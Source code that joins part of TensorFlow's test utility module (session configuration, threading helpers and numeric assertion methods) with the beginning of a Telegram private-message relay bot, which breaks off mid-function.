`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if context.executing_eagerly():
yield None
elif graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
return a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg=msg, equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections.Mapping)
if a_is_dict != isinstance(b, collections.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b, err_msg=msg)
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
def assertAllLess(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.float) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound)
if open_lower_bound else np.less(target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2, "Devices %s and %s are not equal. %s" %
(device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
|
main.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import json
import telegram.ext
import telegram
import sys
import datetime
import os
import logging
import threading
Version_Code = 'v1.1.0' # 版本号
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
PATH = os.path.dirname(os.path.realpath(__file__)) + '/'
CONFIG = json.loads(open(PATH + 'config.json', 'r').read()) # 加载配置文件
LANG = json.loads(open(PATH + 'lang/' + CONFIG['Lang'] + '.json'
).read()) # 加载语言文件
MESSAGE_LOCK = False
message_list = json.loads(open(PATH + 'data.json', 'r').read()) # 加载消息数据
PREFERENCE_LOCK = False
preference_list = json.loads(open(PATH + 'preference.json', 'r').read()) # 加载用户资料与设置
def save_data(): # 保存消息数据
global MESSAGE_LOCK
while MESSAGE_LOCK:
time.sleep(0.05)
MESSAGE_LOCK = True
f = open(PATH + 'data.json', 'w')
f.write(json.dumps(message_list))
f.close()
MESSAGE_LOCK = False
def save_preference(): # 保存用户资料与设置
global PREFERENCE_LOCK
while PREFERENCE_LOCK:
time.sleep(0.05)
PREFERENCE_LOCK = True
f = open(PATH + 'preference.json', 'w')
f.write(json.dumps(preference_list))
f.close()
PREFERENCE_LOCK = False
def save_config(): # 保存配置
f = open(PATH + 'config.json', 'w')
f.write(json.dumps(CONFIG, indent=4))
f.close()
def init_user(user): # 初始化用户
global preference_list
if not str(user.id) in preference_list: # 如果用户是第一次使用Bot
preference_list[str(user.id)] = {}
preference_list[str(user.id)]['notification'] = False # 默认关闭消息发送提示
preference_list[str(user.id)]['blocked'] = False # 默认用户未被封禁
preference_list[str(user.id)]['name'] = user.full_name # 保存用户昵称
threading.Thread(target=save_preference).start()
return
if not 'blocked' in preference_list[str(user.id)]: # 兼容1.0.x版本
preference_list[str(user.id)]['blocked'] = False
if preference_list[str(user.id)]['name'] != user.full_name: # 如果用户的昵称变了
preference_list[str(user.id)]['name'] = user.full_name
threading.Thread(target=save_preference).start()
updater = telegram.ext.Updater(token=CONFIG['Token'])
dispatcher = updater.dispatcher
me = updater.bot.get_me()
CONFIG['ID'] = me.id
CONFIG['Username'] = '@' + me.username
print('Starting... (ID: ' + str(CONFIG['ID']) + ', Username: ' \
+ CONFIG['Username'] + ')')
def process_msg(bot, update): # 处理消息
global message_list
init_user(update.message.from_user)
if CONFIG['Admin'] == 0: # 如果未设置管理员
bot.send_message(chat_id=update.message.from_user.id,
text=LANG['please_setup_first'])
return
if update.message.from_user.id == CONFIG['Admin']: # 如果是管理员发送的消息
if update.message.reply_to_message: # 如果未回复消息
if str(update.message.reply_to_message.message_id) in message_list: # 如果消息数据存在
msg = update.message
sender_id = message_list[str(update.message.reply_to_message.message_id)]['sender_id']
# 匿名转发
try:
if msg.audio:
bot.send_audio(chat_id=sender_id,
audio=msg.audio, caption=msg.caption)
elif msg.document:
bot.send_document(chat_id=sender_id,
document=msg.document,
caption=msg.caption)
elif msg.voice:
bot.send_voice(chat_id=sender_id,
voice=msg.voice, caption=msg.caption)
elif msg.video:
bot.send_video(chat_id=sender_id,
video=msg.video, caption=msg.caption)
elif msg.sticker:
bot.send_sticker(chat_id=sender_id,
sticker=update.message.sticker)
elif msg.photo:
bot.send_photo(chat_id=sender_id,
photo=msg.photo[0], caption=msg.caption)
elif msg.text_markdown:
bot.send_message(chat_id=sender_id,
text=msg.text_markdown,
parse_mode=telegram.ParseMode.MARKDOWN)
else:
bot.send_message(chat_id=CONFIG['Admin'],
text=LANG['reply_type_not_supported'])
return
except Exception as e:
if e.message \
== 'Forbidden: bot was blocked by the user':
bot.send_message(chat_id=CONFIG['Admin'],
text=LANG['blocked_alert']) # Bot被停用
else:
bot.send_message(chat_id=CONFIG['Admin'],
text=LANG['reply_message_failed'])
return
if preference_list[str(update.message.from_user.id)]['notification']: # 如果启用消息发送提示
bot.send_message(chat_id=update.message.chat_id,
text=LANG['reply_message_sent']
% (preference_list[str(sender_id)]['name'],
str(sender_id)),
parse_mode=telegram.ParseMode.MARKDOWN)
else:
bot.send_message(chat_id=CONFIG['Admin'],
text=LANG['reply_to_message_no_data'])
else:
bot.send_message(chat_id=CONFIG['Admin'],
text=LANG['reply_to_no_message'])
else: # 如果不是管理员发送的消息
if preference_list[str(update.message.from_user.id)]['blocked']:
bot.send_message(chat_id=update.message.from_user.id,text=LANG['be_blocked_alert'])
return
fwd_msg = bot.forward_message(chat_id=CONFIG['Admin'],
from_chat_id=update.message.chat_id,
message_id=update.message.message_id) # 转发消息
if fwd_msg.sticker: # 如果是贴纸,则发送发送者身份提示
bot.send_message(chat_id=CONFIG['Admin'],
text=LANG['info_data']
% (update.message.from_user.full_name,
str(update.message.from_user.id)),
parse_mode=telegram.ParseMode.MARKDOWN,
reply_to_message_id=fwd_msg.message_id)
if preference_list[str(update.message.from_user.id)]['notification']: # 如果启用消息发送提示
bot.send_message(chat_id=update.message.from_user.id,text=LANG['message_received_notification'])
message_list[str(fwd_msg.message_id)] = {}
message_list[str(fwd_msg.message_id)]['sender_id'] = update.message.from_user.id
threading.Thread(target=save_data).start() # 保存消息数据
pass
def process_command(bot, update): # 处理指令
init_user(update.message.from_user)
id = update.message.from_user.id
global CONFIG
global preference_list
command = update.message.text[1:].replace(CONFIG['Username'], ''
).lower().split()
if command[0] == 'start':
bot.send_message(chat_id=update.message.chat_id,
text=LANG['start'])
return
elif command[0] == 'version':
bot.send_message(chat_id=update.message.chat_id,
text='Telegram Private Message Chat Bot\n'
+ Version_Code
+ '\nhttps://github.com/Netrvin/telegram-pm-chat-bot'
)
return
elif command[0] == 'setadmin': # 设置管理员
if CONFIG['Admin'] == 0: # 判断管理员是否未设置
CONFIG['Admin'] = int(update.message.from_user.id)
save_config()
bot.send_message(chat_id=update.message.chat_id,
text=LANG['set_admin_successful'])
else:
bot.send_message(chat_id=update.message.chat_id,
text=LANG['set_admin_failed'])
return
elif command[0] == 'togglenotification': # 切换消息发送提示开启状态
preference_list[str(id)]['notification'] = \
preference_list[str(id)]['notification'] == False
threading.Thread(target=save_preference).start()
if preference_list[str(id)]['notification']:
bot.send_message(chat_id=update.message.chat_id,
text=LANG['togglenotification_on'])
else:
bot.send_message(chat_id=update.message.chat_id,
text=LANG['togglenotification_off'])
elif command[0] == 'info': # 发送者信息
if update.message.from_user.id == CONFIG['Admin'] \
and update.message.chat_id == CONFIG['Admin']:
if update.message.reply_to_message:
if str(update.message.reply_to_message.message_id) in message_list:
sender_id = message_list[str(update.message.reply_to_message.message_id)]['sender_id']
bot.send_message(chat_id=update.message.chat_id,
text=LANG['info_data']
% (preference_list[str(sender_id)]['name'],
str(sender_id)),
parse_mode=telegram.ParseMode.MARKDOWN,
reply_to_message_id=update.message.reply_to_message.message_id)
else:
bot.send_message(chat_id=update.message.chat_id,text=LANG['reply_to_message_no_data'])
else:
bot.send_message(chat_id=update.message.chat_id,text=LANG['reply_to_no_message'])
else:
bot.send_message(chat_id=update.message.chat_id, text=LANG['not_an_admin'])
elif command[0] == 'ping': # Ping~Pong!
bot.send_message(chat_id=update.message.chat_id, text='Pong!')
elif command[0] == 'ban': # 封禁用户
if update.message.from_user.id == CONFIG['Admin'] \
